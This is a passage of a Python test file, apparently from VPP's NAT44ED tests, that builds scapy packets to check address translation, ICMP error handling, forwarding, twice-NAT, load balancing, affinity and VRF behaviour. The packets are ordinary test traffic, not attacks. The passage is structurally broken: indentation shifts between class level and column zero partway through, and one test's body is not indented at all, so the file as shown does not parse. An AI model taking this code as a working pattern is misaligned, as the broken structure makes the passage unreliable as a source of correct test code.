        :param is_add: expect session-add (SADD) vs delete (SDEL)
        :param is_ip6: expect the inside address to be pg0's IPv6 one
        """
        message = data.decode('utf-8')
        try:
            message = SyslogMessage.parse(message)
        except ParseError as e:
            self.logger.error(e)
            raise
        else:
            self.assertEqual(message.severity, SyslogSeverity.info)
            self.assertEqual(message.appname, 'NAT')
            self.assertEqual(message.msgid, 'SADD' if is_add else 'SDEL')
            sd_params = message.sd.get('nsess')
            self.assertTrue(sd_params is not None)
            if is_ip6:
                self.assertEqual(sd_params.get('IATYP'), 'IPv6')
                self.assertEqual(sd_params.get('ISADDR'), self.pg0.remote_ip6)
            else:
                self.assertEqual(sd_params.get('IATYP'), 'IPv4')
                self.assertEqual(sd_params.get('ISADDR'), self.pg0.remote_ip4)
                # SSUBIX only present for IPv4 sessions here
                self.assertTrue(sd_params.get('SSUBIX') is not None)
            self.assertEqual(sd_params.get('ISPORT'), "%d" % self.tcp_port_in)
            self.assertEqual(sd_params.get('XATYP'), 'IPv4')
            self.assertEqual(sd_params.get('XSADDR'), self.nat_addr)
            self.assertEqual(sd_params.get('XSPORT'), "%d" % self.tcp_port_out)
            self.assertEqual(sd_params.get('PROTO'), "%d" % IP_PROTOS.tcp)
            self.assertEqual(sd_params.get('SVLAN'), '0')
            self.assertEqual(sd_params.get('XDADDR'), self.pg1.remote_ip4)
            self.assertEqual(sd_params.get('XDPORT'),
                             "%d" % self.tcp_external_port)
    def test_icmp_error(self):
        """ NAT44ED test ICMP error message with inner header"""
        payload = "H" * 10
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # in2out (initiate connection)
        p1 = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
              IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
              UDP(sport=21, dport=20) / payload)
        self.pg0.add_stream(p1)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(1)[0]
        # out2in (send ICMP port-unreachable embedding the translated
        # inner packet; NAT must translate the inner header back)
        p2 = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
              IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
              ICMP(type='dest-unreach', code='port-unreachable') /
              capture[IP:])
        self.pg1.add_stream(p2)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(1)[0]
        # NOTE(review): beyond get_capture(1) succeeding, the inner
        # header of the returned ICMP error is only logged, not
        # asserted — confirm whether stronger checks are wanted
        self.logger.info(ppp("p1 packet:", p1))
        self.logger.info(ppp("p2 packet:", p2))
        self.logger.info(ppp("capture packet:", capture))
    def test_icmp_echo_reply_trailer(self):
        """ ICMP echo reply with ethernet trailer"""
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # in2out
        p1 = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
              IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
              ICMP(type=8, id=0xabcd, seq=0))
        self.pg0.add_stream(p1)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        c = self.pg1.get_capture(1)[0]
        self.logger.debug(self.vapi.cli("show trace"))
        # out2in: echo reply using the translated id
        p2 = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
              IP(src=self.pg1.remote_ip4, dst=self.nat_addr, id=0xee59) /
              ICMP(type=0, id=c[ICMP].id, seq=0))
        # force checksum calculation
        p2 = p2.__class__(bytes(p2))
        self.logger.debug(ppp("Packet before modification:", p2))
        # hex representation of vss monitoring ethernet trailer
        # this seems to be just added to end of packet without modifying
        # IP or ICMP lengths / checksums
        p2 = p2 / Raw("\x00\x00\x52\x54\x00\x46\xab\x04\x84\x18")
        # change it so that IP/ICMP is unaffected (IP.len excludes the
        # appended trailer bytes)
        p2[IP].len = 28
        self.logger.debug(ppp("Packet with added trailer:", p2))
        self.pg1.add_stream(p2)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # success criterion: the reply still reaches the inside host
        self.pg0.get_capture(1)
    def test_users_dump(self):
        """ NAT44ED API test - nat44_user_dump """
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        self.vapi.nat44_forwarding_enable_disable(enable=1)
        local_ip = self.pg0.remote_ip4
        external_ip = self.nat_addr
        self.nat_add_static_mapping(local_ip, external_ip)
        # no traffic yet -> no users
        users = self.vapi.nat44_user_dump()
        self.assertEqual(len(users), 0)
        # in2out - static mapping match
        pkts = self.create_stream_out(self.pg1)
        self.pg1.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(len(pkts))
        self.verify_capture_in(capture, self.pg0)
        pkts = self.create_stream_in(self.pg0, self.pg1)
        self.pg0.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(len(pkts))
        self.verify_capture_out(capture, same_port=True)
        # one user with 3 static sessions (TCP/UDP/ICMP)
        users = self.vapi.nat44_user_dump()
        self.assertEqual(len(users), 1)
        static_user = users[0]
        self.assertEqual(static_user.nstaticsessions, 3)
        self.assertEqual(static_user.nsessions, 0)
        # in2out - no static mapping match (forwarding test)
        host0 = self.pg0.remote_hosts[0]
        self.pg0.remote_hosts[0] = self.pg0.remote_hosts[1]
        try:
            pkts = self.create_stream_out(self.pg1,
                                          dst_ip=self.pg0.remote_ip4,
                                          use_inside_ports=True)
            self.pg1.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            capture = self.pg0.get_capture(len(pkts))
            self.verify_capture_in(capture, self.pg0)
            pkts = self.create_stream_in(self.pg0, self.pg1)
            self.pg0.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            capture = self.pg1.get_capture(len(pkts))
            self.verify_capture_out(capture, nat_ip=self.pg0.remote_ip4,
                                    same_port=True)
        finally:
            self.pg0.remote_hosts[0] = host0
        users = self.vapi.nat44_user_dump()
        self.assertEqual(len(users), 2)
        if str(users[0].ip_address) == self.pg0.remote_hosts[0].ip4:
            non_static_user = users[1]
            static_user = users[0]
        else:
            non_static_user = users[0]
            static_user = users[1]
        self.assertEqual(static_user.nstaticsessions, 3)
        self.assertEqual(static_user.nsessions, 0)
        self.assertEqual(non_static_user.nstaticsessions, 0)
        self.assertEqual(non_static_user.nsessions, 3)
        # NOTE(review): the block below repeats the previous dump and
        # checks verbatim — presumably to verify the dump itself does
        # not disturb state; confirm, otherwise it can be removed
        users = self.vapi.nat44_user_dump()
        self.assertEqual(len(users), 2)
        if str(users[0].ip_address) == self.pg0.remote_hosts[0].ip4:
            non_static_user = users[1]
            static_user = users[0]
        else:
            non_static_user = users[0]
            static_user = users[1]
        self.assertEqual(static_user.nstaticsessions, 3)
        self.assertEqual(static_user.nsessions, 0)
        self.assertEqual(non_static_user.nstaticsessions, 0)
        self.assertEqual(non_static_user.nsessions, 3)
def test_frag_out_of_order_do_not_translate(self):
""" NAT44ED don't translate fragments arriving out of order """
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat44_forwarding_enable_disable(enable=True)
self.frag_out_of_order(proto=IP_PROTOS.tcp, dont_translate=True)
    def test_forwarding(self):
        """ NAT44ED forwarding test """
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        self.vapi.nat44_forwarding_enable_disable(enable=1)
        real_ip = self.pg0.remote_ip4
        alias_ip = self.nat_addr
        flags = self.config_flags.NAT_IS_ADDR_ONLY
        self.vapi.nat44_add_del_static_mapping(is_add=1,
                                               local_ip_address=real_ip,
                                               external_ip_address=alias_ip,
                                               external_sw_if_index=0xFFFFFFFF,
                                               flags=flags)
        try:
            # in2out - static mapping match
            pkts = self.create_stream_out(self.pg1)
            self.pg1.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            capture = self.pg0.get_capture(len(pkts))
            self.verify_capture_in(capture, self.pg0)
            pkts = self.create_stream_in(self.pg0, self.pg1)
            self.pg0.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            capture = self.pg1.get_capture(len(pkts))
            self.verify_capture_out(capture, same_port=True)
            # in2out - no static mapping match: traffic is forwarded
            # untranslated (the second remote host has no mapping)
            host0 = self.pg0.remote_hosts[0]
            self.pg0.remote_hosts[0] = self.pg0.remote_hosts[1]
            try:
                pkts = self.create_stream_out(self.pg1,
                                              dst_ip=self.pg0.remote_ip4,
                                              use_inside_ports=True)
                self.pg1.add_stream(pkts)
                self.pg_enable_capture(self.pg_interfaces)
                self.pg_start()
                capture = self.pg0.get_capture(len(pkts))
                self.verify_capture_in(capture, self.pg0)
                pkts = self.create_stream_in(self.pg0, self.pg1)
                self.pg0.add_stream(pkts)
                self.pg_enable_capture(self.pg_interfaces)
                self.pg_start()
                capture = self.pg1.get_capture(len(pkts))
                self.verify_capture_out(capture, nat_ip=self.pg0.remote_ip4,
                                        same_port=True)
            finally:
                self.pg0.remote_hosts[0] = host0
            # the forwarded host's sessions exist and one can be
            # deleted through the session API
            user = self.pg0.remote_hosts[1]
            sessions = self.vapi.nat44_user_session_dump(user.ip4, 0)
            self.assertEqual(len(sessions), 3)
            self.assertTrue(sessions[0].flags &
                            self.config_flags.NAT_IS_EXT_HOST_VALID)
            self.vapi.nat44_del_session(
                address=sessions[0].inside_ip_address,
                port=sessions[0].inside_port,
                protocol=sessions[0].protocol,
                flags=(self.config_flags.NAT_IS_INSIDE |
                       self.config_flags.NAT_IS_EXT_HOST_VALID),
                ext_host_address=sessions[0].ext_host_address,
                ext_host_port=sessions[0].ext_host_port)
            sessions = self.vapi.nat44_user_session_dump(user.ip4, 0)
            self.assertEqual(len(sessions), 2)
        finally:
            # undo forwarding and the address-only static mapping
            self.vapi.nat44_forwarding_enable_disable(enable=0)
            flags = self.config_flags.NAT_IS_ADDR_ONLY
            self.vapi.nat44_add_del_static_mapping(
                is_add=0,
                local_ip_address=real_ip,
                external_ip_address=alias_ip,
                external_sw_if_index=0xFFFFFFFF,
                flags=flags)
    def test_output_feature_and_service2(self):
        """ NAT44ED interface output feature and service host direct access """
        self.vapi.nat44_forwarding_enable_disable(enable=1)
        self.nat_add_address(self.nat_addr)
        self.vapi.nat44_interface_add_del_output_feature(
            sw_if_index=self.pg1.sw_if_index, is_add=1,)
        # session initiated from service host - translate
        pkts = self.create_stream_in(self.pg0, self.pg1)
        self.pg0.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(len(pkts))
        self.verify_capture_out(capture, ignore_port=True)
        pkts = self.create_stream_out(self.pg1)
        self.pg1.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(len(pkts))
        self.verify_capture_in(capture, self.pg0)
        # session initiated from remote host - do not translate
        # (temporarily switch the inside ports so the remote-initiated
        # flows don't collide with the already-translated ones)
        tcp_port_in = self.tcp_port_in
        udp_port_in = self.udp_port_in
        icmp_id_in = self.icmp_id_in
        self.tcp_port_in = 60303
        self.udp_port_in = 60304
        self.icmp_id_in = 60305
        try:
            pkts = self.create_stream_out(self.pg1,
                                          self.pg0.remote_ip4,
                                          use_inside_ports=True)
            self.pg1.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            capture = self.pg0.get_capture(len(pkts))
            self.verify_capture_in(capture, self.pg0)
            pkts = self.create_stream_in(self.pg0, self.pg1)
            self.pg0.add_stream(pkts)
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            capture = self.pg1.get_capture(len(pkts))
            self.verify_capture_out(capture, nat_ip=self.pg0.remote_ip4,
                                    same_port=True)
        finally:
            # restore the class-default inside ports
            self.tcp_port_in = tcp_port_in
            self.udp_port_in = udp_port_in
            self.icmp_id_in = icmp_id_in
def test_twice_nat(self):
    """ NAT44ED Twice NAT """
    # both source and destination are translated; shared helper
    self.twice_nat_common()
def test_self_twice_nat_positive(self):
    """ NAT44ED Self Twice NAT (positive test) """
    # client and service share the same pg interface; self-twice-NAT
    # must hairpin the traffic (expected to succeed)
    self.twice_nat_common(self_twice_nat=True, same_pg=True)
def test_self_twice_nat_lb_positive(self):
    """ NAT44ED Self Twice NAT local service load balancing (positive test)
    """
    # load-balanced local service reached from the same pg interface
    self.twice_nat_common(lb=True, self_twice_nat=True, same_pg=True,
                          client_id=1)
def test_twice_nat_lb(self):
    """ NAT44ED Twice NAT local service load balancing """
    # twice-NAT combined with a load-balancing static mapping
    self.twice_nat_common(lb=True)
def test_output_feature(self):
    """ NAT44ED interface output feature (in2out postrouting) """
    self.vapi.nat44_forwarding_enable_disable(enable=1)
    self.nat_add_address(self.nat_addr)
    self.nat_add_outside_interface(self.pg0)
    # in2out translation happens post-routing on pg1
    self.vapi.nat44_interface_add_del_output_feature(
        sw_if_index=self.pg1.sw_if_index, is_add=1)

    # in2out
    pkts = self.create_stream_in(self.pg0, self.pg1)
    self.pg0.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(len(pkts))
    self.verify_capture_out(capture, ignore_port=True)
    self.logger.debug(self.vapi.cli("show trace"))

    # out2in
    pkts = self.create_stream_out(self.pg1)
    self.pg1.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(len(pkts))
    self.verify_capture_in(capture, self.pg0)
    self.logger.debug(self.vapi.cli("show trace"))

    # in2out (TTL=2: still forwardable, decremented on the way out)
    pkts = self.create_stream_in(self.pg0, self.pg1, ttl=2)
    self.pg0.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(len(pkts))
    self.verify_capture_out(capture, ignore_port=True)
    self.logger.debug(self.vapi.cli("show trace"))

    # out2in
    pkts = self.create_stream_out(self.pg1, ttl=2)
    self.pg1.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(len(pkts))
    self.verify_capture_in(capture, self.pg0)
    self.logger.debug(self.vapi.cli("show trace"))

    # in2out with TTL=1: packets must not be forwarded; expect an
    # ICMP time-exceeded error back on the ingress interface instead
    pkts = self.create_stream_in(self.pg0, self.pg1, ttl=1)
    self.pg0.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(len(pkts))
    for p in capture:
        self.assertIn(ICMP, p)
        self.assertEqual(p[ICMP].type, 11)  # 11 == time-exceeded
def test_static_with_port_out2(self):
    """ NAT44ED 1:1 NAPT asymmetrical rule """

    external_port = 80
    local_port = 8080

    self.vapi.nat44_forwarding_enable_disable(enable=1)
    # out2in-only mapping: sessions are created only for traffic
    # initiated from the outside network
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
                                local_port, external_port,
                                proto=IP_PROTOS.tcp, flags=flags)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)

    # from client to service
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=12345, dport=external_port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg0.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # ICMP error from the service side: the embedded (inner) packet
    # must be translated back like regular in2out traffic
    p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         ICMP(type=11) / capture[0][IP])
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        self.assertEqual(p[IP].src, self.nat_addr)
        inner = p[IPerror]
        self.assertEqual(inner.dst, self.nat_addr)
        self.assertEqual(inner[TCPerror].dport, external_port)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service back to client
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=local_port, dport=12345))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.nat_addr)
        self.assertEqual(tcp.sport, external_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # ICMP error from the client side: inner packet translated back
    # to the service's real address/port
    p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         ICMP(type=11) / capture[0][IP])
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        self.assertEqual(p[IP].dst, self.pg0.remote_ip4)
        inner = p[IPerror]
        self.assertEqual(inner.src, self.pg0.remote_ip4)
        self.assertEqual(inner[TCPerror].sport, local_port)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from client to server (no translation)
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
         TCP(sport=12346, dport=local_port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg0.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service back to client (no translation)
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=local_port, dport=12346))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg0.remote_ip4)
        self.assertEqual(tcp.sport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_static_lb(self):
    """ NAT44ED local service load balancing """
    # fix: renamed local from 'external_addr_n' - the '_n' suffix
    # (network byte order) was misleading; the API is passed the
    # plain dotted-quad string, same as everywhere else in the file
    external_addr = self.nat_addr
    external_port = 80
    local_port = 8080
    server1 = self.pg0.remote_hosts[0]
    server2 = self.pg0.remote_hosts[1]

    # two local backends behind one external address:port, 70/30 weights
    locals = [{'addr': server1.ip4,
               'port': local_port,
               'probability': 70,
               'vrf_id': 0},
              {'addr': server2.ip4,
               'port': local_port,
               'probability': 30,
               'vrf_id': 0}]

    self.nat_add_address(self.nat_addr)
    self.vapi.nat44_add_del_lb_static_mapping(
        is_add=1,
        external_addr=external_addr,
        external_port=external_port,
        protocol=IP_PROTOS.tcp,
        local_num=len(locals),
        locals=locals)
    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        flags=flags, is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg1.sw_if_index,
        is_add=1)

    # from client to service
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=12345, dport=external_port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    server = None
    try:
        ip = p[IP]
        tcp = p[TCP]
        # either backend may be chosen; remember which one for the reply
        self.assertIn(ip.dst, [server1.ip4, server2.ip4])
        if ip.dst == server1.ip4:
            server = server1
        else:
            server = server2
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service back to client
    p = (Ether(src=server.mac, dst=self.pg0.local_mac) /
         IP(src=server.ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=local_port, dport=12345))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.nat_addr)
        self.assertEqual(tcp.sport, external_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # a single session exists for the chosen backend and records
    # the external host; deleting it must leave no sessions behind
    sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
    self.assertEqual(len(sessions), 1)
    self.assertTrue(sessions[0].flags &
                    self.config_flags.NAT_IS_EXT_HOST_VALID)
    self.vapi.nat44_del_session(
        address=sessions[0].inside_ip_address,
        port=sessions[0].inside_port,
        protocol=sessions[0].protocol,
        flags=(self.config_flags.NAT_IS_INSIDE |
               self.config_flags.NAT_IS_EXT_HOST_VALID),
        ext_host_address=sessions[0].ext_host_address,
        ext_host_port=sessions[0].ext_host_port)
    sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
    self.assertEqual(len(sessions), 0)
def test_static_lb_2(self):
    """ NAT44ED local service load balancing (asymmetrical rule) """
    external_addr = self.nat_addr
    external_port = 80
    local_port = 8080
    server1 = self.pg0.remote_hosts[0]
    server2 = self.pg0.remote_hosts[1]

    # two local backends behind one external address:port, 70/30 weights
    locals = [{'addr': server1.ip4,
               'port': local_port,
               'probability': 70,
               'vrf_id': 0},
              {'addr': server2.ip4,
               'port': local_port,
               'probability': 30,
               'vrf_id': 0}]

    self.vapi.nat44_forwarding_enable_disable(enable=1)
    # out2in-only (asymmetrical): only outside-initiated traffic
    # creates sessions; inside-initiated traffic is just forwarded
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.vapi.nat44_add_del_lb_static_mapping(is_add=1, flags=flags,
                                              external_addr=external_addr,
                                              external_port=external_port,
                                              protocol=IP_PROTOS.tcp,
                                              local_num=len(locals),
                                              locals=locals)
    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        flags=flags, is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg1.sw_if_index,
        is_add=1)

    # from client to service
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=12345, dport=external_port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    server = None
    try:
        ip = p[IP]
        tcp = p[TCP]
        # either backend may be chosen; remember which one for the reply
        self.assertIn(ip.dst, [server1.ip4, server2.ip4])
        if ip.dst == server1.ip4:
            server = server1
        else:
            server = server2
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service back to client
    p = (Ether(src=server.mac, dst=self.pg0.local_mac) /
         IP(src=server.ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=local_port, dport=12345))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.nat_addr)
        self.assertEqual(tcp.sport, external_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from client to server (no translation)
    # fix: removed dead store 'server = None' - the variable was
    # assigned here but never read in the remainder of the test
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=server1.ip4) /
         TCP(sport=12346, dport=local_port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, server1.ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service back to client (no translation)
    p = (Ether(src=server1.mac, dst=self.pg0.local_mac) /
         IP(src=server1.ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=local_port, dport=12346))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, server1.ip4)
        self.assertEqual(tcp.sport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_lb_affinity(self):
    """ NAT44ED local service load balancing affinity """
    external_addr = self.nat_addr
    external_port = 80
    local_port = 8080
    server1 = self.pg0.remote_hosts[0]
    server2 = self.pg0.remote_hosts[1]

    # two equally weighted backends
    locals = [{'addr': server1.ip4,
               'port': local_port,
               'probability': 50,
               'vrf_id': 0},
              {'addr': server2.ip4,
               'port': local_port,
               'probability': 50,
               'vrf_id': 0}]

    self.nat_add_address(self.nat_addr)
    # affinity=10800: a client must keep hitting the same backend
    # even after its session is deleted
    self.vapi.nat44_add_del_lb_static_mapping(is_add=1,
                                              external_addr=external_addr,
                                              external_port=external_port,
                                              protocol=IP_PROTOS.tcp,
                                              affinity=10800,
                                              local_num=len(locals),
                                              locals=locals)
    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        flags=flags, is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg1.sw_if_index,
        is_add=1)

    # first connection picks a backend and creates the affinity entry
    p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=1025, dport=external_port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    # remember which backend was selected
    backend = capture[0][IP].dst

    sessions = self.vapi.nat44_user_session_dump(backend, 0)
    self.assertEqual(len(sessions), 1)
    self.assertTrue(sessions[0].flags &
                    self.config_flags.NAT_IS_EXT_HOST_VALID)
    # delete the session; the affinity entry should outlive it
    self.vapi.nat44_del_session(
        address=sessions[0].inside_ip_address,
        port=sessions[0].inside_port,
        protocol=sessions[0].protocol,
        flags=(self.config_flags.NAT_IS_INSIDE |
               self.config_flags.NAT_IS_EXT_HOST_VALID),
        ext_host_address=sessions[0].ext_host_address,
        ext_host_port=sessions[0].ext_host_port)

    # new connections from the same client (different source ports)
    # must all land on the remembered backend
    pkts = []
    for port in range(1030, 1100):
        p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             TCP(sport=port, dport=external_port))
        pkts.append(p)
    self.pg1.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(len(pkts))
    for p in capture:
        self.assertEqual(p[IP].dst, backend)
def test_multiple_vrf_1(self):
    """ Multiple VRF - both client & service in VRF1 """
    # fix: removed unused local 'port = 0' (never read in this test)
    external_addr = '1.2.3.4'
    external_port = 80
    local_port = 8080

    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1, flags=flags)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg6.sw_if_index,
        is_add=1)
    # asymmetrical rule for the service in VRF 1
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
                                local_port, external_port, vrf_id=1,
                                proto=IP_PROTOS.tcp, flags=flags)

    # from client to service
    p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
         IP(src=self.pg6.remote_ip4, dst=external_addr) /
         TCP(sport=12345, dport=external_port))
    self.pg6.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg5.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg5.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service back to client
    p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
